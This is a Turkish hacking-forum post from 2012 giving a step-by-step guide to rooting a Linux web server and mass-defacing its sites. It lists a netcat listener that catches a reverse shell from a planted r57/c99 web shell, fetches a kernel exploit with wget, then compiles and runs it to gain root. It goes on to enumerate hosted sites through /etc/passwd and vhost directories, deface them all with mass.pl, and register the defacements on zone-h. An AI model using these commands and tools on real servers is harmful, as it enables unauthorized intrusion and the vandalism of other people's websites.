Henüz Üye Degilmisin ? Üye Ol | Parolamı Unuttum
Paneli Kapat
SANALGUCLULER Hack ve Güvenlik Platformu  

Linux Server Root (Full Anlatım Resimli)

Linux Server Root (Full Anlatım Resimli) Merhaba Arkadaşlar malzemeler: 1) netcat (for back connect) 2) r57 yada c99 shell (Back connect opsinoyu bazı c99larda da mevcuttur) 3)mass.pl (çoklu deface için indexleyicidir) 4)zone-h.pl (çoklu deface kaydı iç indir ) 5) special bir index Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz karşımıza

AnaSayfa Kimler Online Bugünki Mesajlar Forumları Okundu Kabul Et
Go Back   SANALGUCLULER Hack ve Güvenlik Platformu > Web Güvenlik Açıkları

Yeni Konu aç  Cevapla
 
LinkBack Seçenekler Stil
Alt 17 Ocak 2012, 18:28   #1
Mareşal
Ceybi Nickli Üyenin Kullanıcı Resmi (Avatar)
Üyelik Tarihi: 12 Ocak 2012
Mesajlar: 789
Rep Puanı : 10
Rep Derecesi : Ceybi isimli üye Tecrübe puanını kapatmıştır.
Standart Linux Server Root (Full Anlatım Resimli)

Linux Server Root (Full Anlatım Resimli)
Merhaba Arkadaşlar


malzemeler:
1) netcat (for back connect)
2) r57 yada c99 shell (Back connect opsinoyu bazı c99larda da mevcuttur)
3)mass.pl (çoklu deface için indexleyicidir)
4)zone-h.pl (çoklu deface kaydı içindir)
5) special bir index

Başlayalım başlat çalıştıra cmd yazıp tamam diyoruz
karşımıza siyah ms-dos ekranı gelecek bu ekrana
nc -v -l -p 443 yazalım (ben 443 dedim sizde hangi port açıksa artık) enterlıyalım
Ufak bi not: (bazen sizin portunuz açık olabilir ama serverin o portu açık olmayabilir
açık server portunu Nmap - Zenmap GUI programı bize soyluyor. bununla tarayabilirniz)
evet ornek olarak r57 shellimizde de back connect yerine 443 yazıyoruz




shellimizde de bu yazı çıktıktan sonra dos ekranına donelim baglandıkmı bakalım


evet baglandık serverimiz 2007 sürümü 2.6.22

exploitimizi googledan veya milw0rm türü sitelerden dan arayıp bulduktan sonra

serverin yazma silme izni olan bi klasorune atıyoruz genelde tmp ye atılır tmp dizinleri iki kısımdır birisi dizin olarak /tmp dizinindedir diğeri ise /home1/corppmco/public_html/tmp dizinindedir
ikinci verdiğim joomla sitelerdedir.
wget komutuyla exploiti server upload edelim ornek olarak
wget [Yanlizca 10 Saniyede Üye Olmak Için TIKLAYINIZ...]
exploitlerin uzantısı c dir c diliyle yazıldıklarından dolayı
not: bazı serverlar wget komutunu kabul etmez shellden manuel upload da uygun bir yoldur.
attıgımız exploiti derleyecegiz şimdi ( derleme işleminde yeni isim verecegiz)
gcc -o root 2.6.22.c (root yazdımız yere istediginizi yazabilirsiniz)
chmod ayarı yapacagız
chmod 777 root dedikten sonra explotimizi çağırmaya geldi sıra
./root diyerek exploitimizi çağırıyoruz (alttaki resimde oldugu gibi)

bazen hemen bazen bi süre bekledikten sonra cevap gelir sabırlı olun
id komutuyla kontrol edelim

evet serverimiz rootlandı
whoami komutuylada bu görüyoruz (verdiğimiz isim çıkmalıdır)
uid=0 ı gorduk
şimdi musait bi yere indeximizi ve mass.pl yi atalım
serverdakileri siteleri gormek içinse çok çeşitli yollarımız mevcuttur
bu komutlar :
/etc/vdomainaliases/
/etc/vfilters/
/var/www/vhosts/
/var/named/
/etc/passwd/
/etc/hosts/
/etc/apache/
/etc/apache2/
/etc/named.conf/ gibi
bizimki /var/www/vhosts/ cd /var/www/hosts/ komutunu verdikten sonra
ls (LS yani) komutuyla sıralayıp gorebiliriz yada izinler açıksa shellden o dizine gecebiliriz



siteleri bulup bilgisayarımızda C:/Perl/bin/ klasorunun içine hack.txt diyer kayıt edin.(bilgilsayarınızda perl Programı yuklu olmalıdır)
kayıt ettikten sonra dos ekranında mass deface işlemine gecelim




önce ekrana perl mas.pl yazıp nasıl çalıştıgınız kontrol ediyoruz daha sonra uygulamaya geciyoruz (orda example ı veriyor)
mass deface biraz zaman alabilir sabırlı olmak gerek
işlem bitince all homepages defaced diye bi yazı gelecek bu yazıdan sonra yine başlat çalıştır cmd ye geliyoruz
cd..
cd..
cd perl
cd bin
perl zoneh.pl hack.txt Kam_06 (nickimi yazdım) yazıp enter diyoruz


Ceybi isimli Üye şuanda  online konumundadır   Alıntı ile Cevapla

Sponsor Linkler (Lütfen Sitemize Destek Olmak İçin Günde Bir Kez Tıklayınız)
Cevapla

Paylaş

Etiketler
anlatim, full, full anlatım resimli, linux, linux server root, resimli, root, server

Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Benzer Konular
Konu Konuyu Açan Forum Cevap Son Mesaj
C99 Shell Kullanımı (Resimli Anlatım) Ceybi Web Güvenlik Açıkları 0 01 Şubat 2012 17:33
Joomla Kurulumu(Resimli Anlatım) Ceybi Joomla 0 15 Ocak 2012 16:24
phpBB Kurulumu(Resimli Anlatım) Ceybi phpBB 0 15 Ocak 2012 16:22
vBulletin Kurulumu Resimli Anlatım Ceybi vBulletin 0 15 Ocak 2012 15:59
Exploit Kullanımı Resimli Anlatım Ceybi Exploitler ve Güvenlik Açıkları 0 15 Ocak 2012 13:10


Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 20:30.


"İnsanları da Kağıt Paralar Gibi Güneş'e Tutunuz, İçlerinde Atatürk Yoksa Sahtedirler ..."
Sitemiz bir forum sitesi olduğu için kullanıcılar paylaşımlarını önceden onay almadan anında siteye yazabilmektedir. Bu yazılardan dolayı doğabilecek her türlü sorumluluk yazan kullanıcılara aittir. Yinede sitemizde yasalara aykırı unsurlar bulursanız admin[at]sanalgucluler[dot]com iletisim adresine bildirebilirsiniz, şikayetiniz incelenip en kısa sürede gereken yapılır.
Alemin Kralı, Alexa, Altavista, Android, Android, Apple ios, Apple Iphone, ASP-.NET, Astroloji, Bada, Blackberry, Blackberry Os, C#, C/C++, Çin Malı Telefonlar, Counter Strike, CSS, Delphi, DMOZ, Eklentiler (Hack-Plugins), Ekonomi, Fatmagül’ün Suçu Ne?, Firar, Google Adsense, Google Adwords, Google Analytics, Google Pagerank, Google Translate, Güvenlik Programları, Hayat Devam Ediyor, HTC, HTML-XHTML, Java, JavaScript & AJAX, Kamera Şakaları, Karahan Online, Kaza Videoları, Knight OnLine, Komik Videolar, Kurtlar Vadisi Pusu, Kuzey Güney, Kültür Sanat, Linux, MAC-OS, Maemo, Magazin, Metin2, Mobil, Moderatör Başvuruları, Motorola, Muck, Muhteşem Yüzyıl, Nokia, Ogame, Palm Os, Pardus, PHP, Pis Yedili, Planet, Python, Sağlık, Samsung, Ses&Video Programları, Siemens, Silkroad Online, Sinema, Sonyericsson, Sorularınız ve Cevapları, Spor, Symbian, Sürücü&Driver, Tasarım Programları, Teknoloji, Travian, Tv Rehberi, Unix, vBulletin Temaları, Visual Basic, Windows, Windows Mobile, WolfTeam, World of Warcraft, WPF/WCF, XML/XSLT, Yahoo, Yalan Dünya, Yer Gök Aşk, İlginç Videolar, İnternet Programları, İstanbul Kıyamet Vakti, Öyle Bir Geçer Zamanki
I Love You Google

Search Engine Optimization by vBSEO 3.6.0